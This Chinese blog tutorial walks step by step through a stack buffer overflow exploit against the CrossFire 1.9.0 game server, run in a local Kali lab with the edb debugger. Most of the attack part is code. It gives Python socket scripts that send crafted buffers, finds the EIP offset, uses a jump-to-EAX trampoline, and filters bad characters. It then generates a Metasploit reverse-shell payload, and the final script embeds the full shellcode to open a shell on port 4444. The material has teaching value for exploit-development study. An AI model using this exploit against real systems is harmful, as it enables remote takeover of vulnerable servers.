linux缓存区的创建,Linux下简单的缓冲区溢出

最新推荐文章于 2023-05-15 13:49:41 发布
最新推荐文章于 2023-05-15 13:49:41 发布
阅读量152 收藏
点赞数
文章标签: linux缓存区的创建

缓冲区溢出是什么?

科班出身,或者学过汇编的应该知道,当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被“撑爆”,从而覆盖了相邻内存区域的数据

成功修改内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果

CrossFire

多人在线RPG游戏

1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞 (服务端)

调试工具

edb

运行平台

kali 2.0 x64虚拟机

Linux中内存保护机制

DEP

ASLR

堆栈 cookies

堆栈粉碎

漏洞太老,避免测试中我们的虚拟机被劫持,可以通过iptables设置目标端口只允许本地访问,如果网络是仅主机可以省略

#4444端口是一会开放的测试端口,只允许本地访问

iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP #13327是服务端端口,只允许本地访问 iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP

创建/usr/games/目录,将crossfire1.9.0服务端解压到目录

#解压touch /usr/games/cd/usr/games/

tar zxpf crossfire.tar.gz

运行一下crossfire看看有没有问题    ./crossfire

20180630134748293140.png

出现Waiting for connections即可,有问题看看Error

#开启调试

edb--run /usr/games/crossfire/bin/crossfire

20180630134748476734.png

右下角是paused暂停状态

菜单栏 Debug => Run(F9) 点击两回可以运行起来

可以通过命令查看程序端口信息

#查看开放端口

netstat-pantu | grep 13327

EIP中存放的是下一条指令的地址

这个程序和一般的溢出不同,它必须发送固定的数据量才可以发生溢出,而不是大于某个数据量都可以,我们构造如下python程序测试

#! /usr/bin/python

importsocket

host= "127.0.0.1"crash= "\x41" * 4379 ## \x41为十六进制的大写A

buffer = "\x11(setup sound" + crash + "\x90\x00#" ## \x90是NULL,\x00是空字符

s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327))

data= s.recv(1024)printdata

s.send(buffer)

s.close()print "[*]Payload Sent!"

运行后,edb报错如下

20180630134748693531.png

意思是EIP(存放一下条执行命令的地址)已经被覆盖成上图黑体中的地址,而计算机找不到这个地址。这个地址正是由我们输入的A,说明EIP可控,存在溢出。

这里你也可以测试增加一个A或者减少一个A发送,会发现后边两个数值都不是A,都不可控,也就是说数据量只有为4379时EIP才完全可控

为了查看到底是哪个位置的A才是溢出后的EIP地址,借助工具生成唯一字符串

cd /usr/share/metasploit-framework/tools/exploit/./pattern_create.rb -l 4379

20180630134748827320.png

复制下来,构造如下python脚本

#! /usr/bin/python

importsocket

host= "127.0.0.1"crash= "唯一字符串"buffer= "\x11(setup sound" + crash + "\x90\x00#"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327))

data= s.recv(1024)printdata

s.send(buffer)

s.close()print "[*]Payload Sent!"

开启edb启动程序,运行python程序

20180630134749002125.png

利用工具确认字符串的位置

cd /usr/share/metasploit-framework/tools/exploit/./pattern_offset.rb -q 46367046

20180630134749151539.png

就是说EIP地址前面有4368个字符。   4369,4370,4371,4372的位置存放的是溢出后的EIP地址

我们构造如下python脚本验证

#! /usr/bin/python

importsocket

host= "127.0.0.1"crash= ‘A‘*4368 + ‘B‘*4 + ‘C‘*7 ## 凑够4379个字符buffer= "\x11(setup sound" + crash + "\x90\x00#"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327))

data= s.recv(1024)printdata

s.send(buffer)

s.close()print "[*]Payload Sent!"

20180630134749342945.png

可以看到EIP地址被精准的填充为B字符

20180630134749513843.png

右键ESP,选择 Follow In Dump 查看数据

20180630134749623218.png

因为必须是精确的字符才能溢出,就是说ESP寄存器只能存放7个字符,显然无法存放shellcode

几个寄存器都查看后,选择了EAX。因为EAX存放的是我们之前发送的几千个A,是可控的,且有足够的大小存放shellcode

20180630134749800953.png

思路就是让EIP存放EAX的地址,然后在地址上加12,直接从第一个A的位置开始执行。但是各个机器的EAX的地址也各不相同,不具有通用性,所以直接跳转的思路就放弃。

既然ESP可以存放7个字符,想到了跳转EAX并偏移12

20180630134749958179.png

构造如下python代码运行

#! /usr/bin/python

importsocket

host= "127.0.0.1"crash= ‘A‘*4368 + ‘B‘*4 + ‘\x83\xc0\x0c\xff\xe0\x90\x90‘buffer= "\x11(setup sound" + crash + "\x90\x00#"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327))

data= s.recv(1024)printdata

s.send(buffer)

s.close()print "[*]Payload Sent!"

首先EIP地址仍然是精准的四个B

20180630134750388843.png

ESP => Follow In Dump 查看

20180630134750537281.png

83 c0 0c ff e0 90 90 说明这里也完美写入

思路就是EIP => ESP => EAX,EAX存放shellcode,因为ESP地址不固定,需要借助固定的地址跳转

打开edb,菜单栏 Plugins => OpcodeSearcher => OpcodeSearch

选择crossfire程序,ESP -> EIP,选择一个jmp esp 的地址,这个地址是不会变的

20180630134750683765.png

菜单栏 plugin => breakpointmanager => breakpoints 选择add增加我们上边选择的地址的断点用来测试。

然后我们测试坏字符,经过测试坏字符是\x00\x0a\x0d\x20

生成shellcode并过滤坏字符

cd /usr/share/framework2/./msfpayload -l #可以生成的shellcode的种类

./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 R | ./msfencode -b "\x00\x0a\x0d\x20"

构建python脚本

#!/usr/bin/python

importsocket

host= "127.0.0.1"shellcode=("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"+

"\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"+

"\x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\x45\xb8\xfa"+

"\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"+

"\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"+

"\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"+

"\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"+

"\x1a\x99\x43\x71\x97\x54\x03")

crash= shellcode + "A"*(4368-105) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"buffer= "\x11(setup sound" +crash+ "\x90\x90#)"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327))

data= s.recv(1024)printdata

s.send(buffer)

s.close()print "[*]Payload Sent!"

监听本地的4444端口,即可获取一个shell

咪爷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux溢出提权教程
03-08
通过学习本教程,读者将对Linux溢出提权有深入的理解,并能掌握相关技能,无论是用于防御还是进攻,都能在实际环境中更好地应对缓冲区溢出威胁。 不过,值得注意的是,此教程的压缩包文件列表中包含了一个名为"33....
TCP发送接收缓冲区详细讲解
08-15
过小的缓冲区可能导致数据溢出,造成丢包;过大的缓冲区则可能导致内存浪费,增加系统负担。因此,通常需要根据实际网络条件和应用需求来调整TCP缓冲区大小。在Linux系统中,可以通过`/proc/sys/...
Linux开发(二):缓冲区
王木木
03-08 1111
一、缓冲区类型 标准I/O为我们提供了3种类型的缓冲区:全缓冲区、行缓冲区、无缓冲区。(1)全缓冲区: 这种缓冲区默认大小为BUFSIZ,具体大小与系统定义有关。在缓冲区满或主动调用fflush()函数后,才进行真正的I/O操作,普通磁盘文件的写操作通常使用全缓冲区访问。 // from /usr/include/stdio.h #ifndef BUFSIZ #define BUFSIZ _IO_BUFSIZ // BUFSIZ全局宏定...
Linux Slab分配器(三)--创建缓存
vanbreaker的专栏
06-17 5443
水平有限,描述不当之处还请之处,转载请注明出处http://blog.csdn.net/vanbreaker/article/details/7670272            创建新的缓存必须通过kmem_cache_create()函数来完成,原型如下 struct kmem_cache * kmem_cache_create (const char *name, size_t s
Linux缓冲区
distancening的博客
10-28 1223
所有的磁盘I/O都要进过内核的快缓冲区(内核缓冲区高速缓冲),既然read和write都要被内核缓冲,那么“不带缓冲的IO”指的是在用户的进程中对这两个函数不会进行缓冲,每次read和write都要进行一次系统调用。。 标准IO库提供缓冲的目的是尽可能的减少调用read和write的次数。 flush:冲洗,说明标准缓冲区的写操作。缓冲区可以调用fflush冲洗,也可由标准IO例程自动清洗。
linux入门---缓冲区
qq_68695298的博客
04-11 1020
缓冲区的理解
linux创建内存缓存文件,Linux缓存内存机制
weixin_34798552的博客
04-28 768
在讲解Linux内存管理时已经提到,当你在Linux下频繁存取文件后,即使系统上没有运行许多程序,也会占用大量的物理内存。这是因为当你读写文件的时候,Linux内核为了提高读写的性能和速度,会将文件在内存中进行缓存,这部分内存就是Cache Memory(缓存内存)。即使你的程序运行结束后,Cache Memory 也不会自动释放,这就会导致你的Linux系统在频繁读写文件后,可用物理内存会很少。...
基于Linux地址空间随机化的缓冲区溢出研究.pdf
09-06
缓冲区溢出攻击的原理是通过溢出缓存来覆盖返回地址,使得攻击者可以控制程序的执行流程,达到恶意代码的执行。 Linux 系统下的地址空间随机化技术可以有效地降低缓冲区溢出攻击的成功概率。地址空间随机化技术是...
基于Linux平台的高速拥塞控制算法实现与应用.pdf
09-06
而在拥塞避免阶段,借鉴TCP Vegas的链路缓冲区监控机制,通过检测缓冲区占用情况来预防高速数据流可能导致的溢出,同时引入了拥塞避免分段的思想,以平滑地控制窗口增长,从而减少拥塞的发生。 在Linux平台上的实现...
linux下实现生产者与消费者问题
08-31
由于缓冲区的大小是有限的,因此生产者和消费者之间需要同步,以避免缓冲区溢出或不足。 二、使用POSIX线程库实现生产者与消费者问题 在 Linux 中,可以使用 POSIX 线程库(pthread)来创建多个生产者和消费者线程...
linux创建内存缓存文件,(总结)关于Linux缓存内存 Cache Memory详解
weixin_34766430的博客
04-28 378
PS:前天有童鞋问我,为啥我的Linux系统没运行多少程序,显示的可用内存这么少?其实Linux与Win的内存管理不同,会尽量缓存内存以提高读写性能,通常叫做Cache Memory。有时候你会发现没有什么程序在运行,但是使用top或free命令看到可用内存free项会很少,此时查看系统的 /proc/meminfo 文件,会发现有一项 Cached Memory:输入cat /proc/memi...
Linux--缓冲区--用户级缓冲区的模拟--1017
qq_68741368的博客
10-18 265
缓冲区
linux文件缓冲区
01-27 3985
一:缓冲区机制根据应用程序对文件的访问方式,即是否存在缓冲区,对文件的访问可以分为带缓冲区的操作和非缓冲区的文件操作:缓冲区文件操作:高级文件系统,将在用户空间中自动为正在使用的文件开辟内存缓冲区。非缓冲区文件系统:低级文件系统,如果需要,只能由用户在自己的程序中为每个文件设定缓冲区。如果采用非缓冲的文件访问方式,每次对该文件进行一次读写操作时,都需要使用读写文件系统掉用来处理该操作,因此,如果用户需要访问某个磁盘文件,则每访问一次都要执行一次系统调用,执行一次系统调用将涉及到CPU状态的切换,即从用户空间
网络缓冲 linux,一个简单linux缓冲区利用
weixin_36054508的博客
05-10 100
一个简单linux缓冲区利用by Netfairy - 2016-02-28刚开始接触linux下的漏洞利用,先做个练练手。程序源码如下:#include#include#includeint valid_serial(char * psz){size_t len=strlen(psz);unsigned total=0;size_t i;if(len<10)return 0;for(i=...
缓冲区溢出与数据执行保护DEP实验
qq_38217427的博客
04-20 1038
1 实验目的 构造shellcode代码,Linux系统平台上在关闭数据执行保护机制情况下实现缓冲区溢出攻击。 2 缓冲区溢出原理 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上。程序员通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其它指令,以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用...
缓存linux命令,清除linux缓存命令
weixin_32009069的博客
04-28 308
命令#sync#echo3>/proc/sys/vm/drop_caches查看内存情况:#more/proc/meminfoKernels 2.6.16 and newer provide a mechanism to have the kernel drop the page cache and/or inode and dentry caches on command, wh...
Linux入门---缓冲区模拟实现
最新发布
qq_68695298的博客
05-15 531
实现一个简单缓冲区
Vulkan【5】创建一个命令缓冲区
克劳德D的开发日志
08-04 2833
创建一个命令缓冲区 本节的代码是 04-init_command_buffer.cpp 基本的命令缓冲区操作 在其他图形API中,应用程序可以通过像glLineWidth()这样的API调用来设置诸如线宽之类的属性。在后台,驱动程序将这个API调用转换为特定于gpu特定的命令,并将该命令放入一个命令缓冲区中。出于应用程序的考虑,驱动程序也通过创建和销毁命令缓冲区来管理命令缓冲区。最终,驱动程...
linux缓冲区溢出攻击
03-16
Linux缓冲区溢出攻击是指攻击者利用程序中的缓冲区溢出漏洞,向缓冲区中输入超出其容量的数据,从而覆盖掉程序中的其他数据或代码,从而实现攻击的目的。这种攻击方式常被用于攻击服务器、操作系统和网络设备等系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值